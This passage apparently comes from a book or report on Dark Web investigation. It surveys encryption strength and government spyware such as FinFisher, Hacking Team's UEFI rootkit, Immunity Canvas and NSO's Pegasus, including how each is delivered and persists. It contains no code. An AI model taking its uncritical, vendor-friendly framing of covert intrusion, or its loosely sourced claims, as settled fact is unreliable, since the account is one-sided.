HSProbe also reports whether the hidden services are speaking other protocols on those ports. The user provides a list of Onion addresses to be probed, and HSProbe outputs a list of results.

Because the Dark Web offers encryption, it is perceived by Tor users to provide more anonymity than the Surface Web. Encryption can, in principle, be broken.

In practice, even with significant computing resources, most researchers will find that encryption with 256-bit symmetric keys, or with 1024-bit and larger RSA keys, is not breakable by brute force. Key sizes are only comparable within one algorithm: 512-bit RSA keys, by contrast, have been factored with modest resources, and 1024-bit RSA is now considered too short and is being retired even though no public break of it has been demonstrated. When faster or more advanced computers are available, fast decryption may become possible.

At this moment, an investigative team asking computer scientists to crack Dark Web encryption may well be unable to read individual messages or transaction data.

Other tools worth mentioning are FinFisher, DaVinci and Galileo, Canvas, and Pegasus.

The FinFisher tools perform remote monitoring and remote access management. In a nutshell, the FinFisher malware is installed on a target's computer through an exploit; for example, the target opens a Microsoft Word file that contains FinFisher code.

A target may fall prey to an Adobe Flash exploit or to an e-mail with an attachment containing the FinFisher payload. FinFisher can also masquerade as legitimate software, such as Firefox.

Essential functions include lawful interception and monitoring, Internet monitoring, blocking, information technology intrusion, satellite tracking, mobile tracking and location, passive tracking of landlines, SMS interception, speech recognition, link analysis, and radio frequency tracking, among others. Licensees of FinFisher tools include the United Kingdom, Qatar, the United Arab Emirates, and the United States.

The Italian company Hacking Team develops DaVinci and Galileo. Hacking Team's software, according to some reports, is used by the US Federal Bureau of Investigation. Hacking Team's rootkit installs the Galileo Remote Control System (RCS).

The malware can be installed if the investigator has physical access to a person of interest's computer, for example when a suspected bad actor crosses a border. Hacking Team's tool consists of code to boot into a shell and insert the rootkit. Hacking Team's surveillance suite for the interception of digital information might be detected by anti-virus programs, but when the rootkit is removed, the firmware component reinstalls it. The company's rootkit software is malware. The tool's distinguishing feature is that it embeds its instructions in the computing device's firmware, the Unified Extensible Firmware Interface (UEFI). Hacking Team's software is therefore not eliminated when the computing device's hard drive is replaced and a fresh operating system is installed.

Hacking Team's method simply pulls the code from the UEFI and reinstalls the surveillance module when the computing device is rebooted. Hacking Team's software works on computers produced by Acer, Dell, Hewlett-Packard, Lenovo, and Toshiba, among others. The software, once installed, can forward the data generated by the user, Webcams, and other applications; this information is then uploaded to servers for additional analysis. Checking a machine for an implant of this kind means dumping the firmware flash and comparing it with the vendor's image, since nothing on the disk will show it; Secure Boot and measured boot with a TPM are the defenses that make such an implant harder to install unnoticed.

Immunity's Canvas provides tools to run the many exploits supported by the framework. Government agencies can use the framework to develop solutions to difficult problems. These range from identifying a weakness in servers suspected of hosting hidden services to finding gaps in computing devices seized by investigators. The business also provides consulting and engineering services to non-profit and government organizations.

In a 2008 white paper, Immunity founder Dave Aitel identified many of the security problems that are making headlines today. The 2008 document also anticipated the Snowden document release, the hacking and subsequent distribution of Hacking Team's software, the conditions that make breaches like the one at the Office of Personnel Management possible, and the exponential growth of vulnerabilities. Canvas is a software package that equips investigators with offensive capability. The Canvas framework is easy to use, with an interface that makes the rich functionality of the software accessible to an investigator through a graphical workspace. The framework allows new polymorphic techniques to be developed that require chip emulation, so advanced exploits become easier to create and maintain.

NSO Group is a company in the field of Internet security software solutions and security research (https://bloomberg.com/research/stocks/private/).

The company's Pegasus software attracted attention after rumors circulated that the FBI had recruited NSO to hack an iPhone used by the San Bernardino terrorists. Pegasus can intercept data sent to and from the telephone; for example, Gmail, Facebook, WhatsApp, and Skype information, among others. The NSO approach relies on a streamlined architecture that uses mobile phone networks and the international Internet backbone. The authorized licensee of the NSO Pegasus system, or NSO's engineers, set up a Pegasus workstation. The workstation interacts with the secure Pegasus installation server.

The licensee or a third party places content containing a “stub” in a document, video, form, or another sort of file. The bad actor downloads the “stub,” and the Pegasus installation server places the difficult-to-detect exploit software on the bad actor's computing device. Once this step is done, the Pegasus server receives information uploaded by the bad actor's computing device. The Pegasus licensee can then interact with the data and take advantage of the many tools which Pegasus includes; for instance, geolocation of the bad actor's device.
